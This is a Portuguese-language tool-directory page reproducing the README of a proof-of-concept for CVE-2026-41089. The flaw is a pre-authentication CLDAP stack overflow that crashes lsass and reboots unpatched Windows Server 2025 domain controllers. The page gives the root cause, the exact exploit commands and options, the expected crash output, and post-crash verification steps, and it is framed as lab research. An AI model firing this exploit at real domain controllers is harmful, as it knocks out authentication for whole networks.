Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-41089-PoC — CVE-2026-41089 LongLogon: crasher de estouro de buffer de pilha pré-autenticação CLDAP (UDP/389) para Netlogon (lsass 0xc0000409) do Windows Server 2025 sem patch. PoC em Python somente com biblioteca padrão + write-up de laboratório. | Kitploit
Ferramentas/GitHubGitHub/1posix/cve-2026-41089-poc
Análise de VulnerabilidadesExploraçãoSegurança de RedeTestes de PenetraçãoRed Teaming
GitHub1posix/cve-2026-41089-poc

CVE-2026-41089-PoC

CVE-2026-41089 LongLogon: crasher de estouro de buffer de pilha pré-autenticação CLDAP (UDP/389) para Netlogon (lsass 0xc0000409) do Windows Server 2025 sem patch. PoC em Python somente com biblioteca padrão + write-up de laboratório.

Ver Repositório
há 5 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-41089 — LongLogon (PoC de travamento)

Estouro de buffer de pilha pré-autenticação no serviço Netlogon do Windows Server 2025. Um único pacote CLDAP (UDP/389) de qualquer host na rede é suficiente: o lsass.exe morre com STATUS_STACK_BUFFER_OVERRUN (0xc0000409) e o controlador de domínio reinicia.

  • Componente: netlogon.dll, NlGetLocalPingResponse / BuildSamLogonResponse
  • Vetor: um pacote UDP/389, não autenticado
  • Impacto: DoS (travamento do lsass.exe, reinicialização do DC)
  • Corrigido em: build 10.0.26100.32772 e posteriores

Como funciona

A resposta a um ping CLDAP do Netlogon é serializada em um buffer de pilha de 528 bytes. O servidor grava seus próprios nomes (floresta, domínio, hostname) seguidos pelo campo User controlado pelo atacante (limitado a 130 caracteres largos). Quando o preenchimento total atinge 536 bytes (buffer + cookie de pilha), o L'\0' final sobrescreve o cookie /GS e o processo trava.

O campo NtVer direciona o caminho do código: 0x02 usa o vulnerável BuildSamLogonResponse, enquanto 0x06 / 0x16 usam o BuildSamLogonResponseEx limitado (seguro). Este PoC envia NtVer = 0x02.

Requisitos

  • DC Windows Server 2025 sem patch: netlogon.dll < 10.0.26100.32772
  • Um domínio DNS longo para que o preenchimento projetado (User=130) atinja >= 536 bytes. O Windows Server 2025 limita nomes de domínio AD a 64 caracteres; com um hostname de 63 caracteres o preenchimento medido é de 581 bytes (travamento garantido). Combinações mais curtas (por exemplo, 533 bytes) são limítrofes.
  • UDP/389 acessível a partir do host atacante
  • Python >= 3.9 (somente stdlib, sem dependências)

Uso

python3 longlogon_exploit.py <dc-ip> <dc-dns-domain> [--dry-run] [--shots N] [--confirm-wait S] [--force]

--dry-run sonda com User=1 (benigno), mostra o preenchimento projetado, não dispara --shots N número de pacotes de estouro a enviar (padrão 1) --confirm-wait S espera antes de re-sondar após um disparo silencioso (padrão 75s) --force dispara mesmo se o preenchimento projetado for inferior a 536 bytes

Exemplo (substitua o IP e o domínio pelos valores do seu laboratório):

python3 longlogon_exploit.py 192.168.1.10 cve202641089.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.example --dry-run
python3 longlogon_exploit.py 192.168.1.10 cve202641089.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.example

Saída esperada do disparo:

[*] CVE-2026-41089 LongLogon crasher -> 192.168.1.10 (domain 64 chars)
[*] DC alive. Probe fill (User=1) = 323 B; projected fill (User=130) = 581 B (buffer 528, cookie 536)
[*] Firing overflow: NtVer=0x02, User=130 chars, shots=1
    shot #1: NO REPLY (5.01 s) -> possible crash (or lost packet)
[*] Waiting 75 s to let the DC (re)start, then re-probing...
[+] DC STILL DOWN after overflow + re-probe -> CRASH LIKELY (reboot in progress or dump pending)

Códigos de saída: 0 travamento provável, 1 DC silencioso na sondagem inicial, 2 preenchimento abaixo de 536 bytes (limítrofe), 3 DC sobreviveu.

Nota: o script re-sonda após 75 segundos porque um único pacote silencioso também pode ser um datagrama UDP perdido. Não conclua um travamento apenas pelo silêncio.

Verificação de pré-condição (não destrutiva)

Use o verificador oficial do repositório de pesquisa. Ele sonda com User=1, então o DC permanece ativo:

git clone https://github.com/ADScanPro/CVE-2026-41089-LongLogon && cd CVE-2026-41089-LongLogon
python3 run longlogon.py <dc-ip> <dc-dns-domain>

Esperado: "PRECONDITION MET" com um preenchimento projetado de pelo menos 536 bytes.

O verificador não comprova o estado do patch: um DC corrigido segue o mesmo caminho de código e simplesmente recusa a escrita excessivamente longa. Verifique a versão do netlogon.dll no DC diretamente (< 10.0.26100.32772 = vulnerável).

Confirmação após o travamento

No DC, depois que ele voltar:

(Get-CimInstance Win32_OperatingSystem).LastBootUpTime
Get-WinEvent -FilterHashtable @{LogName='Application'; Id=1000} -MaxEvents 5

Procure pelo evento 1000: aplicativo com falha lsass.exe, módulo com falha netlogon.DLL, código de exceção 0xc0000409, e um horário de inicialização posterior ao disparo.

Resultados de laboratório

Testado no Windows Server 2025, lsass.exe 10.0.26100.7309, netlogon.dll 10.0.26100.32230 (sem patch), domínio de 64 caracteres + hostname de 63 caracteres (preenchimento projetado de 581 bytes). Um pacote disparado:

    Application Error (Id 1000):
      Faulting application: lsass.exe, version: 10.0.26100.7309
      Faulting module:    netlogon.DLL, version: 10.0.26100.32230
      Exception code:     0xc0000409        (STATUS_STACK_BUFFER_OVERRUN)
      Fault offset:       0x000000000002399d

    LastBootUpTime: 17:19:42   (crash logged at 17:18:37)

Notas

  • DoS, não RCE, por padrão: o cookie /GS transforma o estouro em um travamento controlado antes que o endereço de retorno seja alcançado. O campo User é totalmente controlado pelo atacante, o que é um caminho teórico para execução de código.
  • Janela limítrofe: entre 528 e 535 bytes de preenchimento o travamento não é garantido (medições de laboratório: 535 B = 6/6 travamentos, 534 B = 0/6).
  • O travamento não é idempotente: tire um snapshot do DC antes de disparar.
  • Após um travamento o DC pode voltar com Netlogon DBFlag 0x2080FFFF (modo de reparo), o que é normal após um travamento do lsass.

Aviso legal

Este PoC é fornecido apenas para fins educacionais e de pesquisa. Ele foi desenvolvido e testado em um ambiente de laboratório isolado no Windows Server 2025. Use por sua conta e risco.

Ao usar este script, você concorda que o autor não é responsável por qualquer perda de dados, interrupção de serviço, dano de hardware ou outras consequências diretas ou indiretas. O travamento não é idempotente: o controlador de domínio alvo irá reiniciar. Tire um snapshot antes de disparar.

Não há garantia de que este PoC funcione em um ambiente de produção ou em todas as builds do Windows Server 2025.

Referências

  • Pesquisa e verificador: https://github.com/ADScanPro/CVE-2026-41089-LongLogon
  • Write-up: https://adscanpro.com/blog/patch-diffing-cve-2026-41089-netlogon
Baixar ferramenta